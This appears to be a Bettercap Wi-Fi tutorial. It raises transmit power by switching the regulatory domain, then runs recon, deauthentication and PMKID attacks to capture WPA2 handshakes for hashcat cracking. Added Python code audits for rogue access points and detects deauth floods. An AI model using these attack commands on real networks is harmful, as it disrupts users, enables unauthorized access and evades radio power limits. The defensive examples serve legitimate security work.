Set TX Power to 30 dBm
First, obtain the country the adapter is set to:
iw reg get
If not already set, change the regulatory domain to one of the following: BO, BZ, GY, NZ, VE
iw reg set BZ
Now set the interface transmit power:
ip link set wlan1 down
iw wlan1 set txpower fixed 3000
iw wlan1 set monitor control
ip link set wlan1 up
Test that everything works:
aireplay-ng --test wlan1
Start Bettercap 2 and specify the interface that is capable of injection and monitor mode:
bettercap -iface wlan1
Inside Bettercap start wifi recon:
wifi.recon on
That should result in lots of wifi events being displayed: found APs, stations connecting and disconnecting.
By default, Bettercap saves all wifi-related data to /root/bettercap-wifi-handshakes.pcap. To save the captured handshakes to another file:
set wifi.handshakes.file /root/cst/cst-wireless.pcap
To show the results of the wireless recon, we run wifi.show. However, in crowded areas the output will fill a few screens, so we need to filter it:
set wifi.show.filter '^cst.*'
This will restrict the SSIDs shown to only those that match the regexp.
Time to show the APs:
wifi.show
┌─────────┬───────────────────┬─────────────┬──────────────────┬─────┬─────┬─────────┬────────┬────────┬──────────┐
│ RSSI ▴ │ BSSID │ SSID │ Encryption │ WPS │ Ch │ Clients │ Sent │ Recvd │ Seen │
├─────────┼───────────────────┼─────────────┼──────────────────┼─────┼─────┼─────────┼────────┼────────┼──────────┤
│ -40 dBm │ 45:72:6d:82:ef:12 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 60 │ 2 │ 46 kB │ 11 kB │ 11:48:49 │
│ -40 dBm │ 45:72:7d:82:ef:13 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 1 │ 1 │ 110 kB │ 5.9 kB │ 11:48:56 │
│ -44 dBm │ 45:72:7d:82:55:26 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 6 │ 2 │ 373 kB │ 150 kB │ 11:48:58 │
│ -49 dBm │ 45:72:6d:87:1a:f1 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 136 │ 1 │ 20 kB │ 2.3 kB │ 11:48:55 │
│ -64 dBm │ 45:72:7d:87:1a:f2 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 11 │ │ │ │ 11:48:44 │
│ -76 dBm │ 45:72:6d:87:55:ac │ cstwireless │ WPA2 (TKIP, PSK) │ │ 100 │ 8 │ 60 kB │ 116 kB │ 11:48:54 │
└─────────┴───────────────────┴─────────────┴──────────────────┴─────┴─────┴─────────┴────────┴────────┴──────────┘
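The table above is read by eye here, but the same output is what a defender would parse to inventory which BSSIDs advertise a given SSID and spot an AP that should not be there. The following Python is an added example, not Bettercap's own code: it parses the box-drawn wifi.show table, applies the same kind of SSID regexp that wifi.show.filter uses, and reports any BSSID advertising the filtered SSID that is missing from an allowlist. The sample table is copied from the recon output above; the AUTHORIZED_BSSIDS allowlist and the function names are constructed assumptions, and the allowlist deliberately omits one of the six rows so that the audit has something to report.

```python
import re

# Constructed sample input: the wifi.show table from the recon step (same values),
# embedded here so the parser can be run offline.
WIFI_SHOW_OUTPUT = """\
┌─────────┬───────────────────┬─────────────┬──────────────────┬─────┬─────┬─────────┬────────┬────────┬──────────┐
│ RSSI ▴ │ BSSID │ SSID │ Encryption │ WPS │ Ch │ Clients │ Sent │ Recvd │ Seen │
├─────────┼───────────────────┼─────────────┼──────────────────┼─────┼─────┼─────────┼────────┼────────┼──────────┤
│ -40 dBm │ 45:72:6d:82:ef:12 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 60 │ 2 │ 46 kB │ 11 kB │ 11:48:49 │
│ -40 dBm │ 45:72:7d:82:ef:13 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 1 │ 1 │ 110 kB │ 5.9 kB │ 11:48:56 │
│ -44 dBm │ 45:72:7d:82:55:26 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 6 │ 2 │ 373 kB │ 150 kB │ 11:48:58 │
│ -49 dBm │ 45:72:6d:87:1a:f1 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 136 │ 1 │ 20 kB │ 2.3 kB │ 11:48:55 │
│ -64 dBm │ 45:72:7d:87:1a:f2 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 11 │ │ │ │ 11:48:44 │
│ -76 dBm │ 45:72:6d:87:55:ac │ cstwireless │ WPA2 (TKIP, PSK) │ │ 100 │ 8 │ 60 kB │ 116 kB │ 11:48:54 │
└─────────┴───────────────────┴─────────────┴──────────────────┴─────┴─────┴─────────┴────────┴────────┴──────────┘
"""

# Constructed allowlist (assumption): the BSSIDs the site owner knows about.
# The last AP of the table, 45:72:6d:87:55:ac, is intentionally left out.
AUTHORIZED_BSSIDS = [
    "45:72:6d:82:ef:12",
    "45:72:7d:82:ef:13",
    "45:72:7d:82:55:26",
    "45:72:6d:87:1a:f1",
    "45:72:7d:87:1a:f2",
]


def parse_wifi_show(text):
    """Parse bettercap's box-drawn wifi.show table into a list of dicts keyed by column name."""
    rows, header = [], None
    for line in text.splitlines():
        if not line.startswith("│"):
            continue  # skip the ┌ ├ └ border lines
        cells = [c.strip() for c in line.strip().split("│")[1:-1]]
        if header is None:
            # The first "│" line is the header; drop the sort-direction arrow (▴ / ▾).
            header = [re.sub(r"\s*[▴▾]", "", c) for c in cells]
            continue
        row = dict(zip(header, cells))
        row["RSSI"] = int(row["RSSI"].split()[0])  # "-40 dBm" -> -40
        row["Ch"] = int(row["Ch"])
        rows.append(row)
    return rows


def apply_show_filter(rows, pattern):
    """Mimic `set wifi.show.filter '<regexp>'`: keep only rows whose SSID matches the regexp."""
    rx = re.compile(pattern)
    return [r for r in rows if rx.search(r["SSID"])]


def find_unauthorized_aps(rows, ssid_pattern, authorized_bssids):
    """Report every AP advertising a matching SSID from a BSSID that is not on the allowlist."""
    known = {b.lower() for b in authorized_bssids}
    findings = []
    for r in apply_show_filter(rows, ssid_pattern):
        if r["BSSID"].lower() not in known:
            findings.append({
                "bssid": r["BSSID"],
                "ssid": r["SSID"],
                "channel": r["Ch"],
                "rssi": r["RSSI"],
                "encryption": r["Encryption"],
            })
    return findings


if __name__ == "__main__":
    aps = parse_wifi_show(WIFI_SHOW_OUTPUT)
    for f in find_unauthorized_aps(aps, "^cst.*", AUTHORIZED_BSSIDS):
        print(f"unlisted AP {f['bssid']} advertising {f['ssid']!r} on ch {f['channel']} "
              f"({f['rssi']} dBm, {f['encryption']})")
```

Feed it the text of a real wifi.show dump (for example a copy of the terminal output) and keep the allowlist in version control; a BSSID that advertises your SSID but never appears in the allowlist is worth walking over to, whichever side of the engagement you are on.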
The wifi recon will hop across every channel the adapter is capable of tuning to. To make it stay on a specific channel:
wifi.recon.channel 1
If there are stations connected to the AP, try a deauth attack, specifying the AP's BSSID (MAC address):
wifi.deauth 45:72:6d:82:ef:12
Bettercap will tell you every time a handshake was captured. If there are no stations, try the new PMKID attack:
wifi.assoc 45:72:7d:87:1a:f2
The file produced by this step needs to be converted to a format recognizable by hashcat:
hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap
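The deauth step earlier is loud on the air: every injected frame is a management frame of subtype deauthentication (or disassociation), and a wireless IDS on the defending side can count them per sender. The following Python is an added example, not part of the original page and not Bettercap's code: it strips the radiotap pseudo-header that monitor-mode captures carry, decodes the fixed 802.11 MAC header, and raises an alert when one sender emits at least a threshold number of deauth/disassoc frames within a sliding time window. The sample frames, timestamps, threshold and the detect_deauth_flood name are constructed assumptions; the MAC addresses reuse two BSSIDs from the wifi.show table.

```python
import struct
from collections import defaultdict

MGMT = 0               # frame-control "type" value for management frames
SUBTYPE_DEAUTH = 12    # management subtypes that tear down a client's session
SUBTYPE_DISASSOC = 10


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def strip_radiotap(packet):
    """Drop the radiotap pseudo-header that monitor-mode pcaps (DLT 127) prepend.
    Its total length is the little-endian u16 at bytes 2-3."""
    _version, _pad, rt_len = struct.unpack_from("<BBH", packet, 0)
    return packet[rt_len:]


def parse_80211_header(frame):
    """Decode the fixed part of an 802.11 MAC header (radiotap already removed)."""
    if len(frame) < 24:
        raise ValueError("frame shorter than a management header")
    fc, _flags, _duration = struct.unpack_from("<BBH", frame, 0)
    info = {
        "type": (fc >> 2) & 0x3,       # bits 2-3 of the first frame-control byte
        "subtype": (fc >> 4) & 0xF,    # bits 4-7
        "addr1": mac_str(frame[4:10]),   # receiver / destination
        "addr2": mac_str(frame[10:16]),  # transmitter / source
        "addr3": mac_str(frame[16:22]),  # BSSID for management frames
        "reason": None,
    }
    is_teardown = info["type"] == MGMT and info["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC)
    if is_teardown and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]  # body starts after seq-ctrl
    return info


def detect_deauth_flood(captures, threshold=10, window=5.0):
    """captures: list of (timestamp_seconds, raw_80211_frame).
    Returns one alert per transmitter whose peak count of deauth/disassoc frames
    inside any `window`-second span reaches `threshold`."""
    per_src = defaultdict(list)
    for ts, raw in captures:
        h = parse_80211_header(raw)
        if h["type"] == MGMT and h["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            per_src[h["addr2"]].append((ts, h))
    alerts = []
    for src, events in per_src.items():
        events.sort(key=lambda e: e[0])
        peak, start = 0, 0
        for end in range(len(events)):           # sliding window over sorted timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({
                "source": src,
                "bssid": events[0][1]["addr3"],
                "peak_in_window": peak,
                "total": len(events),
                "reasons": sorted({e[1]["reason"] for e in events}),
            })
    return alerts


# Constructed sample frames (not captured traffic). Layout: frame control, duration,
# addr1, addr2, addr3, sequence control, then the 2-byte reason code for deauth.
DEAUTH_SAMPLE = bytes.fromhex("c000" "0000" "ffffffffffff" "45726d82ef12" "45726d82ef12" "0000" "0700")
OTHER_DEAUTH = bytes.fromhex("c000" "0000" "ffffffffffff" "45726d8755ac" "45726d8755ac" "0000" "0300")
BEACON_SAMPLE = bytes.fromhex("8000" "0000" "ffffffffffff" "45726d82ef12" "45726d82ef12" "0000" + "00" * 12)
RADIOTAP_MIN = bytes.fromhex("00000800" "00000000")  # version 0, length 8, no fields present

# One beacon, a burst of twelve broadcast deauths from the first AP within 1.1 s,
# and a single deauth from another AP (normal client departure, not a flood).
SAMPLE_CAPTURE = [(0.0, BEACON_SAMPLE)]
SAMPLE_CAPTURE += [(0.5 + 0.1 * i, DEAUTH_SAMPLE) for i in range(12)]
SAMPLE_CAPTURE.append((3.0, OTHER_DEAUTH))


if __name__ == "__main__":
    for a in detect_deauth_flood(SAMPLE_CAPTURE):
        print(f"deauth flood from {a['source']} (BSSID {a['bssid']}): "
              f"{a['peak_in_window']} frames in window, reasons {a['reasons']}")
```

When reading a real monitor-mode pcap, apply strip_radiotap to each packet before parse_80211_header, and tune threshold and window to the site: an AP that legitimately evicts a client sends a handful of these frames, while an injection tool sends dozens per second to the broadcast address.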